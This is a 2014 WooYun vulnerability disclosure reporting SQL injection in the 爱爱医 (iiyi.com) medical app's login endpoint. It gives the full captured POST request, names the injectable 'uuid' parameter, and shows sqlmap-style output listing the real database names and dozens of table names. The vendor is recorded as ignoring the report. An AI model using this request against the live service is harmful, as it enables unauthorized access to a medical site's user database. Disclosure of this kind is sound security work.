爱爱医app端注入 | wooyun-2014-056860

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2014-056860

漏洞标题：

爱爱医app端注入

漏洞详情

披露状态：

2014-04-12：细节已通知厂商并且等待厂商处理中
2014-04-17：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

爱爱医app端注入

详细说明：

登录抓包

POST /zlzs/v6/user/login/ HTTP/1.1
Content-Length: 105
Content-Type: application/x-www-form-urlencoded
Host: iapp.iiyi.com
Accept-Encoding: gzip
Proxy-Connection: close
Connection: close
username=test&version=62&signature=316fb0a67b25435b&os=2&uuid=864394014414512&password=test&channel=iiyi

POST注入注入点uuid

数据库：

available databases [3]:
[*] iiyicenter
[*] information_schema
[*] test

144个表列表速度很慢慢慢...
我就没有全部列举出来

fetching tables for database: 'iiyicenter'
fetching number of tables for database 'iiyicenter'
resumed: 144
resumed: advertise
resumed: advertise_static
resumed: app_access_detail
resumed: app_access_uuid
resumed: app_activety
resumed: app_counts
resumed: app_coupon
resumed: app_cbversion
resumed: applica_content
resumed: applica_content_copy
resumed: applica_dbversion
resumed: applica_downdetial
resumed: applica_perdownload
resumed: applica_sort
resumed: band_records
resumed: base_area
resumed: base_hospital
resumed: bbs_sphinx
resumed: beans_order
resumed: case
resumed: case_admin
resumed: case_collection
resumed: case_comment
resuming partial value: case_comment_sup

这速度受不鸟了、

漏洞证明：

↑

修复方案：

╮(╯▽╰)╭

版权声明：转载请注明来源 Hancock@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2014-04-17 20:08

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Hancock@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Hancock@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞